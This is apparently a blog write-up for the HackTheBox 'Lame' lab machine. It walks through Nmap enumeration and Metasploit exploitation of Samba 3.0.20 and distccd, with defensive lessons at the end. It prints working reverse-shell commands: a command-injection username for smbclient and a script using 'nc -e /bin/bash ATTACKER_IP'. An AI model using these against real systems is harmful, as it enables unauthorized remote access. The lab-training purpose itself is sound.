Post

HTB Lame Writeup (Walkthrough)

Posted
Preview Image
By ,
5 min read
HTB Lame Writeup (Walkthrough)

Introduction

Lame was the first box released on HackTheBox, and it’s considered an excellent starting point for beginners. This machine demonstrates classic vulnerabilities in outdated services and provides a straightforward path to root access. In this writeup, I’ll walk through the enumeration process and present multiple methods to exploit this Linux machine.

Machine Overview

  • Name: Lame
  • IP Address: 10.10.10.3
  • Difficulty: Easy
  • OS: Linux
  • Points: 20

Initial Reconnaissance

Let’s begin with a comprehensive Nmap scan to identify open ports and available services.

1
2

# Nmap scan for all ports with service detection and default scripts
nmap -p- -sC -sV 10.10.10.3 -oA nmap/full-scan

Nmap Results

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

Starting Nmap 7.94 ( https://nmap.org ) at 2025-04-22 14:30 EDT
Nmap scan report for 10.10.10.3
Host is up (0.023s latency).
Not shown: 65530 closed tcp ports (reset)

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

From the Nmap results, we can identify several potential attack vectors:

  1. FTP (port 21) - vsftpd 2.3.4 with anonymous login allowed
  2. SSH (port 22) - OpenSSH 4.7p1
  3. Samba (ports 139, 445) - Samba 3.0.20
  4. Distributed Compiler Daemon (port 3632) - distccd v1

Let’s explore each of these services for vulnerabilities.

Vulnerability Assessment

1. FTP Server (vsftpd 2.3.4)

This version of vsftpd is known to have a backdoor vulnerability that was introduced in the source code. Let’s try to exploit it first.

1
2

# Connect to FTP anonymously
ftp 10.10.10.3

While anonymous login is allowed, there don’t appear to be any interesting files accessible. Let’s check if the vsftpd backdoor is exploitable:

1
2
3
4
5

# Using Metasploit to check for vsftpd backdoor
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 10.10.10.3
run

Unfortunately, this exploitation attempt fails. It seems the backdoor might not be triggered or isn’t present on this instance.

2. Samba Server (Samba 3.0.20)

Samba 3.0.20 is quite old and might be vulnerable to various exploits. Let’s check what shares are available:

1
2

# Enumerate Samba shares
smbclient -L //10.10.10.3 -N

Output:

1
2
3
4
5
6
7

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
tmp             Disk      oh noes!
opt             Disk      
IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))

We found several shares. Let’s check if we can access them without credentials:

1
2

# Try to connect to the tmp share
smbclient //10.10.10.3/tmp -N

We can connect to the tmp share without authentication. Let’s search for vulnerabilities in this Samba version:

1

searchsploit samba 3.0.20

Output:

1
2
3
4
5

---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Username' map scrip| unix/remote/16320.rb
---------------------------------------------- ---------------------------------

There’s a username map script command execution vulnerability that allows remote code execution. We can exploit this using either Metasploit or a manual approach.

3. Distributed Compiler Daemon (distccd)

The distccd service on port 3632 might also be vulnerable to remote code execution. Let’s check available exploits:

1

searchsploit distccd

Output:

1
2
3
4
5

---------------------------------------------- ---------------------------------
 Exploit Title                                |  Path
---------------------------------------------- ---------------------------------
DistCC Daemon - Command Execution (Metasploit)| multiple/remote/9915.rb
---------------------------------------------- ---------------------------------

Exploitation Methods

Method 1: Exploiting Samba with Metasploit

Let’s use Metasploit to exploit the username map script vulnerability in Samba:

1
2
3
4

msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
exploit

Executing this exploit gives us a shell as root directly:

1
2
3
4
5

meterpreter > shell
Process 2539 created.
Channel 1 created.
whoami
root

Method 2: Manual Exploitation of Samba

We can also exploit this vulnerability manually by connecting to the service with a specially crafted username:

1

smbclient //10.10.10.3/tmp -N --option='client min protocol=NT1' -U './=`nohup nc -e /bin/bash ATTACKER_IP 4444`'

Before running the above command, start a netcat listener on your machine:

1

nc -lvnp 4444

This will provide a shell on the target system when the exploit is successful.

Method 3: Exploiting distccd Service

Another vector is through the distccd service:

1
2
3
4

msfconsole
use exploit/unix/misc/distcc_exec
set RHOSTS 10.10.10.3
exploit

This gives us a shell as the daemon user, which requires privilege escalation to gain root access.

Manual distccd Exploitation

We can also exploit the distccd service manually:

1
2
3
4
5
6
7

# First, create a file with the command to execute
echo '#!/bin/bash' > cmd.sh
echo 'nc -e /bin/bash ATTACKER_IP 5555' >> cmd.sh
chmod +x cmd.sh

# Then use distcc to execute our command
./distccd_exploit.py 10.10.10.3 cmd.sh

With a netcat listener running on port 5555, we should receive a connection.

Post-Exploitation

Once we have a shell as root, let’s collect our flags:

1
2

cat /home/makis/user.txt
cat /root/root.txt

Privilege Escalation (If needed from distccd exploit)

If we used the distccd exploit and got a shell as a non-root user, we could try various privilege escalation techniques:

  1. Check kernel version for exploits: 
    1

    uname -a
  2. Look for SUID binaries: 
    1

    find / -perm -4000 -type f 2>/dev/null
  3. Check for writable files in /etc: 
    1

    find /etc -writable -type f 2>/dev/null

However, with this box’s age and the kernel version (likely 2.6.x), there are multiple kernel exploits available that would grant root access.

Lessons Learned

  1. Keep services updated: All exploitable services on this box were outdated with known vulnerabilities.
  2. Disable unnecessary services: Running unnecessary services like vsftpd and distccd increases the attack surface.
  3. Configure services securely: Anonymous FTP access and unauthenticated Samba shares are security risks.
  4. Implement proper access controls: Critical vulnerabilities often stem from lacking authentication or authorization mechanisms.

Additional Resources

Conclusion

Lame is an excellent machine for beginners to practice basic enumeration and exploitation techniques. Despite being the first box on HackTheBox, it still teaches valuable lessons about the importance of keeping systems updated and properly secured. The multiple vectors for exploitation also provide different learning opportunities and approaches to compromising a system.

Done!

Hi there 👋 Support me!

Life is an echo—what you send out comes back.

Donate

HackTheBox, Writeup, Easy
Writeup HTB-Easy Samba vsftpd Metasploit distcc
This post is licensed under CC BY 4.0 by the author.